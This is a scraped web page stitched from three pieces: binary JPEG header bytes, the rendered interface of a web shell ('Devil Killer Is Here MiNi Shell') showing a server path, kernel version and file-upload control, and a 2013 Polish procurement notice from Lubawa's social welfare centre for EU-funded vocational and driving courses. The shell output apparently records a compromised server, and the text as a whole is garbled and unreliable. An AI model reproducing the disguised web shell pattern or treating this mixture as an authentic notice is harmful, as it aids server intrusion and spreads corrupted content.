JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130823/168165-N-2013.html

<p class="kh_header"><b>Lubawa: Organizacja i przeprowadzenie usług edukacyjnych  i szkoleniowych dla uczestników i uczestniczek projektu systemowego  pn. Aktywna rodzina  Ośrodka Pomocy Społecznej Gminy Lubawa realizowanego w 2013r. współfinansowanego ze środków Unii  Europejskiej w ramach  Europejskiego Funduszu Społecznego  w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji  społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</b><br>
<b>Numer ogłoszenia: 168165 - 2013; data zamieszczenia: 23.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Gminy Lubawa , Fijewo 73, 14-260 Lubawa, woj. warmińsko-mazurskie, tel. 0-89 6455439, faks 0-89 6455439.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopslubawa.4bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie usług edukacyjnych  i szkoleniowych dla uczestników i uczestniczek projektu systemowego  pn. Aktywna rodzina  Ośrodka Pomocy Społecznej Gminy Lubawa realizowanego w 2013r. współfinansowanego ze środków Unii  Europejskiej w ramach  Europejskiego Funduszu Społecznego  w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji  społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie usług edukacyjnych  i szkoleniowych dla uczestników i uczestniczek projektu systemowego  pn. Aktywna rodzina  Ośrodka Pomocy Społecznej Gminy Lubawa realizowanego w 2013r. współfinansowanego ze środków Unii  Europejskiej w ramach  Europejskiego Funduszu Społecznego  w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji  społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
PRZEDMIOT ZAMÓWIENIA został podzielony na 7 części zamówienia, z których każda stanowi odrębną część i może być przedmiotem oferty częściowej
CZĘŚĆ 1  KURS  ZAWODOWY - Pomocnik kucharza
a)Ilość  osób 1  osoba,
b)Ilość godzin szkolenia minimum 120 godz., w tym:  30 godz. zajęć teoretycznych i  90  godz.  zajęć praktycznych
c)Okres realizacji PAŹDZIERNIK  - LISTOPAD  2013r
c)Minimalny zakres tematyczny szkolenia
Przygotowanie stanowiska pracy zgodnie z wymogami,
bezpieczeństwo i higiena pracy,
zapoznanie się z warsztatem kucharskim,
poznanie zasad higieny obowiązujących przy sporządzaniu posiłków,
nauka układania na półmiskach potraw ciepłych, zimnych oraz deserów,
Czynności porządkowe w kuchni,
Przechowywanie surowców i przygotowanie do obróbki wstępnej,
Obróbka wstępna jaj,
Obróbka wstępna ryb,
Obróbka wstępna jarzyn,
Obróbka wstępna drobiu i dzikiego ptactwa,
Obróbka wstępna mięsa zwierząt rzeźnych i dziczyzny,
Obróbka wstępna podrobów,
Przygotowanie surówek,
Obróbka termiczna produktów,
Przygotowanie sałatek,
Przygotowanie potraw mlecznych,
Obróbka termiczna jarzyn,
Przygotowanie potraw z kaszy,
Przygotowanie potraw z mąki,
Przygotowanie potraw z jaj,
Sporządzanie zup i dodatków do zup.
d)Materiały dla uczestników szkolenia: uczestniczka powinna otrzymać na własność materiały wspomagające tematykę szkolenia, a także 1 notatnik i 1 długopis.
e)Miejsce realizacji
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława
Zajęcia praktyczne -Miasto Lubawa, Gmina Lubawa, Miasto Iława.

CZĘŚĆ 2: KURS   ZAWODOWY - Obsługa wózka widłowego (jezdniowego)
a)Ilość  osób 1  osoba,
b)Ilość godzin szkolenia: minimum 67 godz., w tym  48 godz. zajęć teoretycznych i  19  godz.  zajęć praktycznych
c)Okres realizacji PAŹDZIERNIK  - LISTOPAD  2013r
d)Minimalny zakres tematyczny szkolenia 
Program szkolenia umożliwiający zdobycie uprawnień na kierowcę wózków jezdniowych musi być zrealizowany zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 kwietnia 2010r.  w sprawie kwalifikacji zawodów i specjalności dla potrzeb rynku pracy oraz zakresu jej stosowania (Dz.U. z 2010r. Nr 82, poz. 537) w związku z Rozporządzeniem Ministra Gospodarki z dnia 18 lipca 2001r. w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych (Dz. U. Nr 79, poz. 849 z późniejszymi zmianami) oraz bezpieczna obsługa, wymiana butli gazowych w wózkach wyposażonych w te urządzenia.
e)Materiały dla uczestników szkolenia: uczestniczka powinna otrzymać na własność materiały wspomagające tematykę szkolenia, a także 1 notatnik i 1 długopis.
f) Miejsce realizacji:
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława
Zajęcia praktyczne -Miasto Lubawa, Gmina Lubawa, Miasto Iława.


3CZĘŚĆ 3 KURS  ZAWODOWY - Opiekunka osób starszych i niepełnosprawnych
a)Ilość  osób 1  osoba,
b)Ilość godzin szkolenia: minimum 80 godz., w tym  40 godz. zajęć teoretycznych                               i  40  godz.  zajęć praktycznych
c)Okres realizacji PAŹDZIERNIK  - LISTOPAD  2013r.
d)Minimalny zakres tematyczny szkolenia 
Wykonywanie usług pielęgnacyjno-opiekuńczych osób starszych,
Zapoznanie z podstawami wiedzy związanej z wiekiem starszym oraz osób niepełnosprawnych,
Zapoznanie z podstawowymi regulacjami prawnymi,
Zapoznanie z potrzebami osób starszych i niepełnosprawnych, ich uwarunkowaniami psychologicznymi i medycznymi potrzebami,
Wykonywanie codziennych czynności związanych z prowadzeniem gospodarstwa domowego, 
Wspieranie biologicznych funkcji życiowych podopiecznego, 
Organizowanie czasu podopiecznemu i dotrzymywanie towarzystwa itp.
e)Materiały dla uczestników szkolenia: uczestniczka powinna otrzymać na własność materiały wspomagające tematykę szkolenia, a także 1 notatnik i 1 długopis.
f)Miejsce realizacji
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława
Zajęcia praktyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława.

CZĘŚĆ 4:  KURS  ZAWODOWY - Konserwator 
a)Ilość  osób 1  osoba
b)Ilość godzin szkolenia minimum 90 godz., w tym:  30 godz. zajęć teoretycznych                               i  60 godz.  zajęć praktycznych
c)Okres realizacji PAŹDZIERNIK  - LISTOPAD  2013r
d)Minimalny zakres tematyczny szkolenia
Prawo pracy,
Bhp, 
Pierwsza pomoc przedmedyczna, 
Zagadnienia związane z zawodem konserwatora m.in. elementy wykończenia wnętrz;                elementy stolarstwa, hydrauliki, ślusarstwa, materiałoznawstwa; technologia w pracy konserwatora i inne.
e)Materiały dla uczestników szkolenia: uczestnik powinien otrzymać na własność materiały wspomagające tematykę szkolenia, a także 1 notatnik i 1 długopis.
f)Miejsce realizacji
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława
Zajęcia praktyczne -Miasto Lubawa, Gmina Lubawa, Miasto Iława.


CZĘŚĆ 5:  KURS  ZAWODOWY - Fryzjerka
a)Ilość  osób 2  osoby
b)Ilość godzin szkolenia minimum 180 godz., w tym  30 godz. zajęć teoretycznych                               i  150 godz.  zajęć praktycznych
c)Okres realizacji PAŹDZIERNIK  - LISTOPAD  2013r
d)Minimalny zakres tematyczny szkolenia: 
Przygotowanie stanowiska pracy,
Poznanie zasad pielęgnacji włosów,
Nauka rozpoznawania i określenia gatunku włosów,
Poznanie środków do pielęgnacji włosów i do zabiegów fryzjerskich,
Nauka układania fryzur: dzienne, użytkowe i wieczorowe,
Nauka obcinania włosów, przyborami fryzjerskimi,
Nauka wykonywania balejażu, farbowania włosów,
BHP itp.
e)Materiały dla uczestników szkolenia: uczestniczka powinna otrzymać na własność materiały wspomagające tematykę szkolenia, a także 1 notatnik i 1 długopis.
f)Miejsce realizacji
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława
Zajęcia praktyczne -Miasto Lubawa, Gmina Lubawa, Miasto Iława.

CZĘŚĆ 6  KURS  -  Prawa jazdy kat. B  
a)Ilość  osób 10  osób
b)Ilość godzin szkolenia: minimum 60 godz., w tym:  30 godz. zajęć teoretycznych (grupowych) i  30 godz.  zajęć praktycznych (indywidualnych)
c)Okres realizacji: PAŹDZIERNIK  - LISTOPAD  2013r
d)Minimalny zakres tematyczny szkolenia: 
Szkolenie powinno być zrealizowane zgodnie z Rozporządzeniem Ministra Infrastruktury                             z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania  i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. Nr 217 poz. 1834 z późn. zm.).
Szkolenie powinno zakończyć się egzaminem  wewnętrznym (kończącym szkolenie), uprawniającym do zdawania państwowego egzaminu organizowanego przez Wojewódzki Ośrodek Ruchu Drogowego celem uzyskania prawo jazdy  kat. B.
e)Materiały dla uczestników szkolenia: uczestnik szkolenia powinien otrzymać na własność materiały wspomagające tematykę szkolenia, a także 1 notatnik i 1 długopis.
f)Miejsce realizacji
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa;
Zajęcia praktyczne -Miasto Lubawa, Gmina Lubawa oraz inne miejsca wg. potrzeb wynikających z należytej i koniecznej realizacji szkolenia.

7)CZĘŚĆ 7  KURS  - Prawa jazdy kat. C  
a)Ilość  osób: 1 mężczyzna
b)Ilość godzin szkolenia: minimum 50 godz., w tym  20 godz. zajęć teoretycznych i  30 godz.  zajęć praktycznych (indywidualnych)
c)Okres realizacji: PAŹDZIERNIK  - LISTOPAD  2013r
d)Minimalny zakres tematyczny szkolenia

Nabycie przez uczestnika szkolenia uprawnienia do kierowania zespołem pojazdów samochodowych o dopuszczalnej masie całkowitej przekraczającej 3,5 t. z wyjątkiem autobusu, a także ciągnikiem rolniczym lub pojazdem wolnobieżnym.
Przekazanie wiadomości, umiejętności, a także nauczenia zachowań umożliwiających bezpieczne kierowanie pojazdem kategorii C oraz przygotowanie do zdania egzaminu państwowego, uprawniającego do uzyskanie prawa jazdy kat. C.
e)Materiały dla uczestników szkolenia: uczestnik szkolenia powinien otrzymać na własność materiały wspomagające tematykę szkolenia, a także 1 notatnik i 1 długopis.

f)Miejsce realizacji
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława;
Zajęcia praktyczne -Miasto Lubawa, Gmina Lubawa oraz inne miejsca wg. potrzeb wynikających z należytej i koniecznej realizacji szkolenia.

WYMAGANIA  DOTYCZĄCE PRZEPROWADZENIA SZKOLEŃ

A)KURSY ZAWODOWE -  CZEŚĆ 1, 2, 3, 4, 5
1)Szkolenia muszą być zrealizowane zgodnie z Rozporządzeniem MEN w sprawie uzyskiwania                  i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych                    w formach pozaszkolnych. 
2)Po zakończeniu poszczególnych szkoleń wchodzących w skład CZĘŚCI 1, 2, 3, 4, 5 Wykonawca zobowiązany jest do:

a)wystawienia każdemu uczestnikowi Certyfikatu lub zaświadczenia ukończenia szkolenia z kolorowymi logotypami: Programu Operacyjnego Kapitał Ludzki, Unii Europejskiej, Europejskiego Funduszu Społecznego, którego oryginał  oraz 1 szt. kserokopii za zgodność z oryginałem zobowiązany jest dostarczyć Zamawiającemu w terminie 14 dni od zakończenia szkolenia 

b)wystawienia każdemu uczestnikowi Zaświadczenia o ukończeniu kursu zgodnie z Rozporządzeniem MEN w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych, którego oryginał i 1 szt. kserokopii za zgodność z oryginałem jest zobowiązany dostarczyć Zamawiającemu w terminie 14 dni od zakończenia szkolenia

3)W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do ubezpieczenia uczestników i uczestniczek projektu  od następstw  nieszczęśliwego wypadku powstałych w związku ze szkoleniem (kserokopię opłaconej polisy potwierdzoną za zgodność z oryginałem należy przekazać Zamawiającemu przed rozpoczęciem szkoleń)

4)W przypadku wystąpienia wypadku Wykonawca zobowiązany jest do sporządzenie protokołu okoliczności i przyczyn wypadku z udziałem uczestnika szkolenia

5)Wykonawca zobowiązany jest do zapewnienia i przekazania  uczestnikom szkolenia na własność materiały szkoleniowe i dydaktyczne: podręczniki lub książki i inne niezbędne przedmioty (m.in.: długopisy, notesy) zawierające logo Unii Europejskiej, Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki. 

6)Wykonawca jest  zobowiązany do

a)prowadzenia odpowiedniej dokumentacji potwierdzającej realizację usług, w tym m.in. Dzienników zajęć lub Kart zajęC, list obecności uczestników na szkoleniu i innych dokumentów potwierdzających uczestnictwo Beneficjentów Ostatecznych w szkoleniach

b)stałej współpracy z  Ośrodkiem Pomocy Społecznej Gminy Lubawa

c)bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności osób skierowanych do uczestnictwa                        w szkoleniach
rezygnacji uczestnika uczestniczki z udziału w szkoleniu, pod rygorem odmowy zapłaty za szkolenie
7)Wykonawca jest zobowiązany przekazać Zamawiającemu w  terminie 14 dni od ukończenia poszczególnych szkoleń:
oryginałów  dokumentów projektowych m.in. Dzienników zajęć lub Kart zajęć,                list obecności uczestników projektu na zajęciach i innych dokumentów potwierdzających uczestnictwo w szkoleniach Beneficjentów Ostatecznych
1 egz. - materiałów szkoleniowych, które otrzymali Beneficjenci Ostateczni projektu
innych dokumentów projektowych potwierdzających realizację usługi

8)Wykonawca jest zobowiązany do oznaczenia pomieszczeń, w których realizowane są usługi szkoleniowe zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów                    w ramach POKL zamieszczanymi na stronie internetowej: www.efs.gov.pl  lub www.mrr.gov.pl  lub  www.funduszestrukturalne.gov.pl.


B)KURSY PRAWA  JAZDY  KAT. B  -  CZEŚĆ  6

1)Szkolenie musi być zrealizowane zgodnie z przepisami ustawy z dnia 20 czerwca 1997r.                Prawo o ruchu drogowym (tekst jedn. Dz.U. z 2012r. poz. 1137, 1448), ustawy z dnia 5 stycznia 2011r. o kierujących pojazdami (Dz.U. z 2011r. nr 30 poz. 151 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów                                i egzaminatorów (Dz.U. z 2005r., Nr 217, poz. 1834 z późn. zm.) i innymi  aktualnie obowiązującymi przepisami prawa. 


2)Szkolenie powinno zakończyć się egzaminem  wewnętrznym (kończącym szkolenie), uprawniającym do zdawania państwowego egzaminu organizowanego  przez Wojewódzki Ośrodek Ruchu Drogowego celem uzyskania prawo jazdy  kat. B.

3)W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do ubezpieczenia uczestnika projektu  od następstw  nieszczęśliwego wypadku powstałych w związku ze szkoleniem (kserokopię opłaconej polisy potwierdzoną za zgodność z oryginałem należy przekazać Zamawiającemu przed rozpoczęciem szkoleń)

4)W przypadku wystąpienia wypadku sporządzenia protokołu okoliczności i przyczyn wypadku                   z udziałem uczestnika.

5)Wykonawca zobowiązany jest do zapewnienia i przekazania  uczestnikom szkolenia na własność materiały szkoleniowe i dydaktyczne: podręczniki lub książki, testy egzaminacyjne na płycie, zawierające logo Unii Europejskiej, Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki.

6)Wykonawca zobowiązany jest do  zapewnienia sprawnego samochodu umożliwiającego należytą realizacją zajęć praktycznych.

7)Wykonawca jest zobowiązany do prowadzenia dokumentacji projektowej m.in.


a)Dzienników edukacyjnych (zajęcia edukacyjne teoretyczne) wraz z listami obecności uczestników projektu na zajęciach (potwierdzanie obecności za pomocą własnoręcznego czytelnego podpisu), a także rejestrowania i niezwłocznego zgłaszania Zamawiającemu najpóźniej w następnym dniu wszystkich nieobecności uczestników szkoleń lub rezygnacji                                   z uczestnictwa w szkoleniu w trakcie jego trwania pod rygorem odmowy zapłaty za szkolenie tych osób

b)Kart zajęć praktycznych


8)Wykonawca w terminie 14 dni od zakończeniu szkolenia jest zobowiązany przekazać Zamawiającemu oryginały dokumentów, o których mowa w pkt.7.


9)Szkolenie powinno zakończyć się
egzaminem teoretycznym i praktycznym (wewnętrznym),
wydaniem uczestnikom szkolenia Zaświadczenia o ukończeniu szkolenia podstawowego (wewnętrznego) potwierdzającego, iż dana osoba jest uprawniona do zdawania egzaminu państwowego w WORD (Wojewódzkim Ośrodku Ruchu Drogowego.


10)Wykonawca zobowiązany jest do wystawienia każdemu uczestnikowi Certyfikatu lub zaświadczenia ukończenia szkolenia z kolorowymi logotypami: Programu Operacyjnego Kapitał Ludzki, Unii Europejskiej, Europejskiego Funduszu Społecznego, którego oryginał                     oraz 1 szt. kserokopii za zgodność z oryginałem zobowiązany jest dostarczyć Zamawiającemu                 w terminie 14 dni od zakończenia szkolenia

11)Wykonawca w ramach przedmiotu zamówienia zobowiązany jest dokonać za poszczególnych uczestników szkolenia  opłaty za
a)wymagane badania lekarskie,  
b)pierwszy egzamin państwowy na prawo jazdy kat. B.


12)Wykonawca zobowiązany jest do przedłożenia Zamawiającemu kserokopii dokumentów wystawionych przez Wojewódzki Ośrodek Ruchu Drogowego (WORD), potwierdzających termin egzaminów państwowych w WORD dla poszczególnych uczestników projektu.  


13)Wykonawca jest zobowiązany do oznaczenia pomieszczeń, w których realizowane                                jest szkolenie w ramach projektu oraz materiałów szkoleniowych zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki zamieszczanymi na stronie internetowej: www.efs.gov.pl  lub www.mrr.gov.pl  lub  www.funduszestrukturalne.gov.pl.



C)KURS PRAWA JAZDY KAT. C  -  CZEŚĆ  7

1)Szkolenie musi być zrealizowane zgodnie z przepisami ustawy z dnia 20 czerwca 1997r.                Prawo o ruchu drogowym (tekst jedn. Dz.U. z 2012r. poz. 1137, 1448), ustawy z dnia 5 stycznia 2011r. o kierujących pojazdami (Dz.U. z 2011r. nr 30 poz. 151 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów                                i egzaminatorów (Dz.U. z 2005r., Nr 217, poz. 1834 z późn. zm.) i innymi  aktualnie obowiązującymi przepisami prawa. 


2)Szkolenie powinno zakończyć się egzaminem  wewnętrznym (kończącym szkolenie), uprawniającym do zdawania państwowego egzaminu organizowanego  przez Wojewódzki Ośrodek Ruchu Drogowego celem uzyskania prawo jazdy  kat. C.

3)W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do ubezpieczenia uczestnika projektu  od następstw  nieszczęśliwego wypadku powstałych w związku ze szkoleniem (kserokopię opłaconej polisy potwierdzoną za zgodność z oryginałem należy przekazać Zamawiającemu przed rozpoczęciem szkoleń)

4)W przypadku wystąpienia wypadku sporządzenia protokołu okoliczności i przyczyn wypadku                   z udziałem uczestnika.

5)Wykonawca zobowiązany jest do zapewnienia i przekazania  uczestnikom szkolenia na własność materiały szkoleniowe i dydaktyczne: podręczniki lub książki, testy egzaminacyjne na płycie, zawierające logo Unii Europejskiej, Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki.

6)Wykonawca zobowiązany jest do  zapewnienia sprawnego samochodu umożliwiającego należytą realizacją zajęć praktycznych.

7)Wykonawca jest zobowiązany do prowadzenia dokumentacji projektowej m.in.


a)Dzienników edukacyjnych (zajęcia edukacyjne - teoretyczne) wraz z listami obecności uczestników projektu na zajęciach (potwierdzanie obecności za pomocą własnoręcznego czytelnego podpisu), a także rejestrowania i niezwłocznego zgłaszania Zamawiającemu najpóźniej w następnym dniu wszystkich nieobecności uczestników szkoleń lub rezygnacji                                   z uczestnictwa w szkoleniu w trakcie jego trwania pod rygorem odmowy zapłaty za szkolenie tych osób

b)Kart zajęć praktycznych.


8)Wykonawca w terminie 14 dni od zakończeniu szkolenia jest zobowiązany przekazać Zamawiającemu oryginały dokumentów, o których mowa w pkt.7.

9)Szkolenie powinno zakończyć się
egzaminem teoretycznym i praktycznym (wewnętrznym),
wydaniem uczestnikom szkolenia Zaświadczenia o ukończeniu szkolenia podstawowego (wewnętrznego) potwierdzającego, iż dana osoba jest uprawniona do zdawania egzaminu państwowego w WORD (Wojewódzkim Ośrodku Ruchu Drogowego.


10)Wykonawca zobowiązany jest do wystawienia każdemu uczestnikowi Certyfikatu lub zaświadczenia ukończenia szkolenia z kolorowymi logotypami: Programu Operacyjnego Kapitał Ludzki, Unii Europejskiej, Europejskiego Funduszu Społecznego, którego oryginał                     oraz 1 szt. kserokopii za zgodność z oryginałem zobowiązany jest dostarczyć Zamawiającemu                 w terminie 14 dni od zakończenia szkolenia

11)Wykonawca w ramach przedmiotu zamówienia zobowiązany jest dokonać za poszczególnych uczestników szkolenia  opłaty za
c)wymagane badania lekarskie,  
d)pierwszy egzamin państwowy na prawo jazdy kat. C.


12)Wykonawca zobowiązany jest do przedłożenia Zamawiającemu kserokopii dokumentów wystawionych przez Wojewódzki Ośrodek Ruchu Drogowego (WORD), potwierdzających termin egzaminów państwowych w WORD dla poszczególnych uczestników projektu.  


13)Wykonawca jest zobowiązany do oznaczenia pomieszczeń, w których realizowane                                jest szkolenie w ramach projektu oraz materiałów szkoleniowych zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki zamieszczanymi na stronie internetowej www.efs.gov.pl  lub www.mrr.gov.pl  lub  www.funduszestrukturalne.gov.pl..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0, 80.41.12.00-0, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
